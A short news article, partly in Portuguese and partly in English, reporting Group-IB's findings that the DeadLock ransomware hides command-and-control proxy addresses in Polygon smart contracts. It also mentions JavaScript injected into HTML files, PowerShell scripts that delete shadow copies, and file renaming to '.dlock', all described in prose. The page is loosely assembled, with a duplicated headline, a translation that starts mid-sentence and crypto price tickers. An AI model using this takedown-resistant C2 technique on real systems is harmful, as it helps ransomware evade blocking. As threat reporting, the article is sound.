infraestrutura blockchain recriada

Binexia · 2026-01-15T16:58:24.000Z

a família de ransomware descoberta está a utilizar a tecnologia blockchain para construir uma infraestrutura de comando e controlo (C2) resistente que os equipas de segurança não conseguem remover facilmente. Investigadores de cibersegurança da Group-IB revelaram que o ransomware DeadLock, identificado pela primeira vez em julho de 2025, armazena endereços de servidores proxy dentro de contratos inteligentes do Polygon. Esta técnica permite que os operadores substituam continuamente os pontos de conexão entre vítimas e atacantes, neutralizando efetivamente os métodos tradicionais de bloqueio.

 discovered ransomware family is weaponizing blockchain technology to build a resilient command-and-control (C2) infrastructure that security teams cannot easily remove.
Group-IB cybersecurity researchers have revealed that the DeadLock ransomware, first identified in July 2025, stores proxy server addresses within Polygon smart contracts.
This technique allows operators to continuously replace the connection points between victims and attackers, effectively neutralizing traditional blocking methods.
Despite its high technical sophistication, DeadLock maintains an unusually low profile by operating quietly without leveraging affiliate programs or public data leak sites.
What sets DeadLock apart
Unlike typical ransomware groups that publicly shame victims, DeadLock threatens to sell stolen data on underground markets.
Malware inserts JavaScript code into HTML files to communicate with smart contracts on the Polygon network.
These smart contracts serve as a decentralized repository storing proxy addresses, and malware queries these addresses via read-only blockchain calls that incur no transaction fees.
Researchers have identified at least three variants of DeadLock, with the latest version integrating Session encrypted messaging to communicate directly with victims.
Read also: CME Group Adds Cardano, Chainlink And Stellar Futures To Crypto Derivatives Suite
Why blockchain-based attacks are significant
This approach directly reflects the 'EtherHiding' technique documented by Google Threat Intelligence in October 2025, after observing North Korean-linked actors using a similar method.
Group-IB analyst Xabier Eizaguirre described the use of smart contracts to relay proxy addresses as 'an interesting method that allows attackers to virtually infinitely adapt and apply this technique.'
Because infrastructure stored on the blockchain cannot be seized or taken offline like traditional servers, its removal is extremely difficult.
Infected files by DeadLock have their extensions changed to ".dlock", and PowerShell scripts disable Windows services and delete shadow copies.
ETHUSDT
Perp.
3,317.36
-1.06%
BTCUSDT
Perp.
95,572.2
-1.47%

blockchain infrastructure rebuld

Últimas Notícias